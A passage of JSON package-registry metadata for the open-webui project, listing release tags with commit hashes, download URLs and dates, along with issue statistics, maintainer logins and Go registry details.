//github.com/open-webui/open-webui/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"9e4dd4b86f77653b59dc1fa97fe3f72e8252b359","kind":"commit","published_at":"2024-06-17T05:52:44.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"8f3c9b391be312c72c1a621135fd3cbe33fc0d15","kind":"commit","published_at":"2024-06-12T18:21:44.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"c41b33c9c0722c84055a833802611f8ee39609d3","kind":"commit","published_at":"2024-06-12T09:14:37.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"3933db2c91e635da52a28a9e7e2927f551b2fee6","kind":"commit","published_at":"2024-06-10T20:53:56.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"75d455ac8fc64f741607613c2277a02e28228a3c","kind":"commit","published_at":"2024-06-10T02:09:28.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"96a004d4d8289db1dea83a322f26ab01be3db3fc","kind":"commit","published_at":"2024-06-10T01:11:53.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.0/manifests"},{"name":"v0.2.5","sha":"dbb83f9824154480908e77fa4562d9fbe73a5de4","kind":"commit","published_at":"2024-06-05T17:06:11.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"f28877f4db2a136f26c495e033f1d2b4ea1b405c","kind":"commit","published_at":"2024-06-04T04:29:13.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"14646e84ea5e9d85fbb27a557ca14fb241cc373b","kind":"commit","published_at":"2024-06-03T20:06:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"5be97b81d61c571eb6758bf7b3d2ee85a09d2d02","kind":"commit","published_at":"2024-06-03T01:27:36.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"cfc78dedf0024ecb97a5090825af2698524c9d71","kind":"commit","published_at":"2024-06-02T21:08:43.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"72354e06a759075024d6be6bc6a8e717ec29d823","kind":"commit","published_at":"2024-06-02T05:03:02.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.0/manifests"},{"name":"v0.1.125","sha":"be5534c655f6cb3cc54c079de3f19d671e7a172b","kind":"commit","published_at":"2024-05-19T20:16:36.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.125","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.125","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.125","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.125","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.125/manifests"},{"name":"v0.1.124","sha":"b8d7fdf16e57deaf7faaa4dad7c2c5666e8b18ed","kind":"commit","published_at":"2024-05-08T17:54:33.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.124","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.124","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.124","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.124","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.124/manifests"},{"name":"v0.1.123","sha":"38ff3209ad2a57d8adb61cd597a7a5f55737ab25","kind":"commit","published_at":"2024-05-02T20:10:28.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.123","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.123","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.123","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.123","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.123/manifests"},{"name":"v0.1.122","sha":"92c98eda2e7340bc7c8f32d33bc49cec8498b1bb","kind":"commit","published_at":"2024-04-28T01:29:10.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.122","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.122","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.122","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.122","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.122/manifests"},{"name":"v0.1.121","sha":"748cb7d4460d38e73bb94260d2f78a98f56b7bf4","kind":"commit","published_at":"2024-04-24T19:31:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.121","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.121","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.121","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.121","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.121/manifests"},{"name":"v0.1.120","sha":"22c50f62cbbe9445bc8ea00695310ed740ad3789","kind":"commit","published_at":"2024-04-21T00:41:00.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.120","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.120","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.120","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.120","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.120/manifests"},{"name":"v0.1.119","sha":"851754700a4d4c90602c57564076521940d88fca","kind":"commit","published_at":"2024-04-16T22:12:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.119","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.119","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.119","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.119","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.119/manifests"},{"name":"v0.1.118","sha":"0399a69b73de9789c4221acedea70d528e1346c4","kind":"commit","published_at":"2024-04-10T22:41:12.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.118","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.118","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.118","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.118","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.118/manifests"},{"name":"v0.1.117","sha":"46774aa5cdbf4e894776978be60311210a6d0b32","kind":"commit","published_at":"2024-04-04T04:43:17.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.117","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.117","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.117","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.117","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.117/manifests"},{"name":"v0.1.116","sha":"3b0cb7945f5c9dbe55d5f76720ddf4e475c11169","kind":"commit","published_at":"2024-03-31T08:17:32.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.116","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.116","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.116","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.116","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.116/manifests"},{"name":"v0.1.115","sha":"ac294a74e7bc5f080970c049c656506e36f9407b","kind":"commit","published_at":"2024-03-24T23:20:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.115","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.115","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.115","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.115","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.115/manifests"},{"name":"v0.1.114","sha":"2fa94956f4e500bf5c42263124c758d8613ee05e","kind":"commit","published_at":"2024-03-21T02:34:22.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.114","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.114","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.114","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.114","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.114/manifests"},{"name":"v0.1.113","sha":"621719c6ac504e1c217fda3e445375a1d20802a3","kind":"commit","published_at":"2024-03-18T18:02:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.113","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.113","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.113","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.113","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.113/manifests"},{"name":"v0.1.112","sha":"5ce421e7faf79f8d7a28fd7cebe6fdc445c4146e","kind":"commit","published_at":"2024-03-15T20:49:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.112","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.112","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.112","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.112","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.112/manifests"},{"name":"v0.1.111","sha":"89634046e721c972eb24bd5115bd9eff77513d7a","kind":"commit","published_at":"2024-03-10T22:00:56.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.111","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.111","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.111","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.111","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.111/manifests"},{"name":"v0.1.110","sha":"8ed5759d0e9424f87d01fe3f8013116c4ba2004f","kind":"commit","published_at":"2024-03-07T04:32:24.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.110","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.110","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.110","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.110","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.110/manifests"},{"name":"v0.1.109","sha":"92e21acb4cfa8fb91c56df2903d7fc33448f7aae","kind":"commit","published_at":"2024-03-06T20:40:28.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.109","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.109","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.109","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.109","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.109/manifests"},{"name":"v0.1.108","sha":"eb51ad14e4caafda1c9fd24c4945044b8776a7a3","kind":"commit","published_at":"2024-03-03T03:25:17.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.108","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.108","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.108","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.108","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.108/manifests"},{"name":"v0.1.107","sha":"6c70d0f770ce4b0acf8d2a33eb7c0f27ffbed631","kind":"commit","published_at":"2024-03-02T07:05:50.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.107","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.107","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.107","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.107","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.107/manifests"},{"name":"v0.1.106","sha":"a181b2b63ba4f263e1683b087194e2f431960525","kind":"commit","published_at":"2024-02-28T04:11:43.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.106","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.106","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.106","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.106","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.106/manifests"},{"name":"v0.1.105","sha":"6df2505bf0352a7580b33f17ce6844afe04fb7be","kind":"commit","published_at":"2024-02-26T05:53:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.105","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.105","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.105","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.105","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.105/manifests"},{"name":"v0.1.104","sha":"3c10c3b928097035655e913eaf0e5dfc900f0f25","kind":"commit","published_at":"2024-02-25T21:05:21.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.104","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.104","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.104","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.104","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.104/manifests"},{"name":"v0.1.103","sha":"02fb517bbe0e40bf8a10df88d9c021f69ffe9ce3","kind":"commit","published_at":"2024-02-25T19:01:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.103","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.103","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.103","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.103","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.103/manifests"},{"name":"v0.1.102","sha":"4a47833f838088a0309edad2f85ff247b2ad6e00","kind":"commit","published_at":"2024-02-23T03:34:09.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.102","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.102","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.102","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.102","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.102/manifests"}]},"repo_metadata_updated_at":"2026-08-30T01:05:39.067Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":6.966061736475957,"dependent_packages_count":6.527826853133711,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":6.746944294804834},"purl":"pkg:golang/github.com/open-webui/open-webui","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/open-webui/open-webui","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/open-webui/open-webui","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/open-webui/open-webui/dependencies","status":null,"funding_links":["https://github.com/sponsors/open-webui"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-29T13:00:29.912Z","issues_count":5574,"pull_requests_count":5137,"avg_time_to_close_issue":789760.6515837105,"avg_time_to_close_pull_request":416863.0681063123,"issues_closed_count":2210,"pull_requests_closed_count":4214,"pull_request_authors_count":1366,"issue_authors_count":3600,"avg_comments_per_issue":1.0256548259777538,"avg_comments_per_pull_request":1.1660502238660697,"merged_pull_requests_count":2411,"bot_issues_count":2,"bot_pull_requests_count":306,"past_year_issues_count":419,"past_year_pull_requests_count":572,"past_year_avg_time_to_close_issue":858892.8048780488,"past_year_avg_time_to_close_pull_request":1331842.4109947644,"past_year_issues_closed_count":205,"past_year_pull_requests_closed_count":382,"past_year_pull_request_authors_count":181,"past_year_issue_authors_count":303,"past_year_avg_comments_per_issue":2.6897374701670644,"past_year_avg_comments_per_pull_request":1.298951048951049,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":25,"past_year_merged_pull_requests_count":109,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/issues","maintainers":[{"login":"silentoplayz","count":208,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/silentoplayz"},{"login":"Classic298","count":134,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Classic298"},{"login":"dannyl1u","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dannyl1u"},{"login":"Silentoplayz","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Silentoplayz"},{"login":"justinh-rahb","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/justinh-rahb"},{"login":"ayanahye","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ayanahye"},{"login":"jackthgu","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jackthgu"},{"login":"andrewbbaek","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andrewbbaek"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"bdsumon4u","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bdsumon4u"},{"login":"matgla","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matgla"},{"login":"byg1004","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byg1004"},{"login":"GryBsh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GryBsh"},{"login":"pagoru","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pagoru"},{"login":"mohswell","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mohswell"},{"login":"MickWang","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MickWang"}],"active_maintainers":[{"login":"Classic298","count":134,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Classic298"},{"login":"silentoplayz","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/silentoplayz"},{"login":"andrewbbaek","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andrewbbaek"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fopen-webui%2Fopen-webui/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fopen-webui%2Fopen-webui/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fopen-webui%2Fopen-webui/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fopen-webui%2Fopen-webui/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fopen-webui%2Fopen-webui/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fopen-webui%2Fopen-webui/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2282222,"maintainers_count":0,"namespaces_count":839591,"keywords_count":126448,"github":"golang","metadata":{"funded_packages_count":72260,"sync_missing_packages_cursor":{"timestamp":"2026-08-17T00:00:58.969562Z","path":"github.com/Tektoncd/operator","version":"v0.78.0"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-09-03T05:01:28.847Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":12838937,"name":"open-webui","ecosystem":"nixpkgs","description":"Comprehensive suite for LLMs with a user-friendly 